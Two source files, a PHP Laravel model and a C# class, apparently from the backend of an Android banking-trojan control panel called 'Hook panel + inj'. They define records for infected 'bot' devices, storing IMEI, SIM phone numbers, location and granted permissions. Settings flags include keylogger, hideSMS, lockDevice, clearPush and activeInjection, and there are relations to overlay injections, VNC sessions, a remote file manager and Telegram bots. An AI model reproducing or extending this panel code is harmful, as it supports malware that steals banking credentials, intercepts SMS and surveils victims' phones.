File: Hook panel + inj/backend/app/Models/Bot.php
<?php

namespace App\Models;

use Database\Factories\BotFactory;
use Eloquent;
use Illuminate\Database\Eloquent\Builder;
use Illuminate\Database\Eloquent\Collection;
use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Relations\HasMany;
use Illuminate\Database\Eloquent\Relations\HasManyThrough;
use Illuminate\Support\Carbon;
use Illuminate\Support\Str;

/**
 * App\Models\Bot
 *
 * @property string $id
 * @property string $ip ip адрес устройства. С портом
 * @property string|null $last_connection Дата подключения устройства.
 * @property string|null $country Название страны устройства.
 * @property string|null $country_code Код страны устройства.
 * @property string|null $tag Тег.
 * @property int $update_settings Флаг для обновления настроек бота.
 * @property int $working_time Время работы устройства в секундах.
 * @property array|null $sim_data JSON массив с информацией о сим-картах устройства. Формат: [{operator:"MTS",phone_number:"88005553535"},{operator:"MTS",phone_number:"88005553536"}]
 * @property array|null $metadata JSON массив с метаданными устройства. Формат: {android:"10",model:"Samsung Galaxy S 100","battery_level":15,"IMEI":14}
 * @property array|null $permissions JSON массив привилегий устройства. Формат: {accessibility:true,protect:true,screen:true,sms:true,cards:true,banks:true,mails:true,download_module:true,admin:true}
 * @property array $settings JSON массив с настройками. Формат: {"hideSMS":true,"lockDevice":true,"offSound":true,"keylogger":true,"clearPush":true,"readPush":true,"activeInjection":true}
 * @property int $set_windows_fake
 * @property int $set_hide_sms_list
 * @property int $set_contact_list
 * @property int $set_accounts
 * @property Carbon|null $created_at
 * @property Carbon|null $updated_at
 * @property string|null $comment
 * @property array|null $location
 * @property-read Collection|BotInjection[] $applications
 * @property-read int|null $applications_count
 * @property-read Collection|Injection[] $injections
 * @property-read int|null $injections_count
 * @property-read Collection|BotLog[] $logs
 * @property-read int|null $logs_count
 * @method static BotFactory factory(...$parameters)
 * @method static Builder|Bot newModelQuery()
 * @method static Builder|Bot newQuery()
 * @method static Builder|Bot query()
 * @method static Builder|Bot whereCountry($value)
 * @method static Builder|Bot whereCountryCode($value)
 * @method static Builder|Bot whereCreatedAt($value)
 * @method static Builder|Bot whereId($value)
 * @method static Builder|Bot whereIp($value)
 * @method static Builder|Bot whereLastConnection($value)
 * @method static Builder|Bot whereMetadata($value)
 * @method static Builder|Bot wherePermissions($value)
 * @method static Builder|Bot whereSetAccounts($value)
 * @method static Builder|Bot whereSetContactList($value)
 * @method static Builder|Bot whereSetHideSmsList($value)
 * @method static Builder|Bot whereSetWindowsFake($value)
 * @method static Builder|Bot whereSettings($value)
 * @method static Builder|Bot whereSimData($value)
 * @method static Builder|Bot whereTag($value)
 * @method static Builder|Bot whereUpdateSettings($value)
 * @method static Builder|Bot whereUpdatedAt($value)
 * @method static Builder|Bot whereWorkingTime($value)
 * @property array|null $sub_info JSON массив с дополнительной информацией об устройстве. Формат:
 *                     {
 *                         "admin": "false",
 *                         "screen": "true",
 *                         "protect": "0",
 *                         "isDozeMode": "true",
 *                         "batteryLevel": "98",
 *                         "accessibility": "true",
 *                         "isKeyguardLocked": "false"
 *                     }
 * @property int $is_favorite
 * @property int $is_blacklisted
 * @property bool $is_new
 * @property string|null $current_file_manager_path
 * @property-read int|null $bot_injections_count
 * @property-read int|null $user_timestamps_count
 * @method static Builder|Bot whereComment($value)
 * @method static Builder|Bot whereCurrentFileManagerPath($value)
 * @method static Builder|Bot whereIsBlacklisted($value)
 * @method static Builder|Bot whereIsFavorite($value)
 * @method static Builder|Bot whereIsNew($value)
 * @method static Builder|Bot whereLocation($value)
 * @method static Builder|Bot whereSubInfo($value)
 * @property-read Collection<int, BotInjection> $botInjections
 * @property-read Collection<int, UserBotTimestamp> $userTimestamps
 * @mixin Eloquent
 */
class Bot extends Model
{
    use HasFactory;

    protected $casts = [
        "sim_data" => "array",
        "metadata" => "array",
        "permissions" => "array",
        "sub_info" => "array",
        "settings" => "array",
        "created_at" => "datetime:Y-m-d H:i:s",
        "updated_at" => "datetime:Y-m-d H:i:s",
        "last_connection" => "datetime:Y-m-d H:i:s",
        "is_new" => "boolean",
        "location" => "array",
    ];

    protected $fillable = [
        "id",
        "sub_info",
        "last_connection",
        "is_favorite",
        "is_blacklisted",
        "settings",
        "update_settings",
        "comment",
        "is_new",
        "current_file_manager_path",
    ];

    public $timestamps = false;

    protected static function boot(): void
    {
        parent::boot();
        static::creating(function ($bot) {
            $bot->{$bot->getKeyName()} = (string)Str::uuid();
        });
    }

    public function getIncrementing(): bool
    {
        return false;
    }

    public function getKeyType(): string
    {
        return "string";
    }

    public function applications(): HasMany
    {
        return $this->hasMany(BotInjection::class);
    }

    public function injections(): HasManyThrough
    {
        return $this->hasManyThrough(Injection::class, BotInjection::class, "bot_id", "application", secondLocalKey: "application");
    }

    public function botInjections(): HasMany
    {
        return $this->hasMany(BotInjection::class, "bot_id", "id");
    }

    public function logs(): HasMany
    {
        return $this->hasMany(BotLog::class);
    }

    public function userTimestamps(): HasMany
    {
        return $this->hasMany(UserBotTimestamp::class, "bot_id", "id");
    }
}

File: Hook panel + inj/asp.net/TelegramInjectionBot/Data/Bot.cs
namespace TelegramInjectionBot.Data;

public class Bot
{
    public Bot()
    {
        BotCommands = new HashSet<BotCommand>();
        BotFilemanagers = new HashSet<BotFilemanager>();
        BotFiles = new HashSet<BotFile>();
        BotInjections = new HashSet<BotInjection>();
        BotLogs = new HashSet<BotLog>();
        BotVncs = new HashSet<BotVnc>();
        UserBotTimestamps = new HashSet<UserBotTimestamp>();
        UserTelegramInjections = new HashSet<UserTelegramInjection>();
        UserTelegramBots = new HashSet<UserTelegramBot>();
    }

    public string Id { get; set; }

    /// <summary>
    ///     ip адрес устройства. С портом
    /// </summary>
    public string Ip { get; set; }

    /// <summary>
    ///     Дата подключения устройства.
    /// </summary>
    public DateTime LastConnection { get; set; }

    /// <summary>
    ///     Название страны устройства.
    /// </summary>
    public string Country { get; set; }

    /// <summary>
    ///     Код страны устройства.
    /// </summary>
    public string CountryCode { get; set; }

    /// <summary>
    ///     Тег.
    /// </summary>
    public string Tag { get; set; }

    /// <summary>
    ///     Флаг для обновления настроек бота.
    /// </summary>
    public bool UpdateSettings { get; set; }

    /// <summary>
    ///     Время работы устройства в секундах.
    /// </summary>
    public int WorkingTime { get; set; }

    /// <summary>
    ///     JSON массив с информацией о сим-картах устройства. Формат: [{&quot;operator&quot;:&quot;Android&quot;,&quot;
    ///     phone_number&quot;:&quot;+15555215554&quot;,&quot;isDualSim&quot;:&quot;false&quot;,&quot;operator1&quot;:&quot;
    ///     &quot;,&quot;phone_number1&quot;:&quot;&quot;}]
    /// </summary>
    public string SimData { get; set; }

    /// <summary>
    ///     JSON массив с метаданными устройства. Формат: {android:&apos;10&apos;,model:&apos;Samsung Galaxy S 100&apos;,&apos;
    ///     battery_level&apos;:15,&apos;IMEI&apos;:14}
    /// </summary>
    public string Metadata { get; set; }

    /// <summary>
    ///     JSON массив привилегий устройства. Формат:
    ///     {
    ///     &quot;all_permission&quot;: &quot;true&quot;,
    ///     &quot;sms_permission&quot;: &quot;false&quot;,
    ///     &quot;overlay_permission&quot;: &quot;true&quot;,
    ///     &quot;accounts_permission&quot;: &quot;true&quot;,
    ///     &quot;contacts_permission&quot;: &quot;true&quot;,
    ///     &quot;notification_permission&quot;: &quot;false&quot;
    ///     }
    /// </summary>
    public string Permissions { get; set; }

    /// <summary>
    ///     JSON массив с дополнительной информацией об устройстве. Формат:
    ///     {
    ///     &quot;admin&quot;: &quot;false&quot;,
    ///     &quot;screen&quot;: &quot;true&quot;,
    ///     &quot;protect&quot;: &quot;0&quot;,
    ///     &quot;isDozeMode&quot;: &quot;true&quot;,
    ///     &quot;batteryLevel&quot;: &quot;98&quot;,
    ///     &quot;accessibility&quot;: &quot;true&quot;,
    ///     &quot;isKeyguardLocked&quot;: &quot;false&quot;
    ///     }
    /// </summary>
    public string SubInfo { get; set; }

    /// <summary>
    ///     JSON местоположения устройства. Формат:
    ///     {
    ///     lat:100,
    ///     lon:100
    ///     }
    /// </summary>
    public string Location { get; set; }

    /// <summary>
    ///     JSON массив с настройками. Формат: {&quot;hideSMS&quot;:true,&quot;lockDevice&quot;:true,&quot;offSound&quot;:true,
    ///     &quot;keylogger&quot;:true,&quot;clearPush&quot;:true,&quot;readPush&quot;:true,&quot;arrayUrl&quot;:[&quot;
    ///     https://yandex.ru/&quot;, &quot;https://yandex.ru/&quot;]}
    /// </summary>
    public string Settings { get; set; }

    public bool IsFavorite { get; set; }
    public bool IsBlacklisted { get; set; }
    public string Comment { get; set; }
    public bool? IsNew { get; set; }
    public DateTime? CreatedAt { get; set; }
    public DateTime? UpdatedAt { get; set; }
    public string CurrentFileManagerPath { get; set; }

    public virtual ICollection<BotCommand> BotCommands { get; set; }
    public virtual ICollection<BotFilemanager> BotFilemanagers { get; set; }
    public virtual ICollection<BotFile> BotFiles { get; set; }
    public virtual ICollection<BotInjection> BotInjections { get; set; }
    public virtual ICollection<BotLog> BotLogs { get; set; }
    public virtual ICollection<BotVnc> BotVncs { get; set; }
    public virtual ICollection<UserBotTimestamp> UserBotTimestamps { get; set; }
    public virtual ICollection<UserTelegramInjection> UserTelegramInjections { get; set; }
    public virtual ICollection<UserTelegramBot> UserTelegramBots { get; set; }
}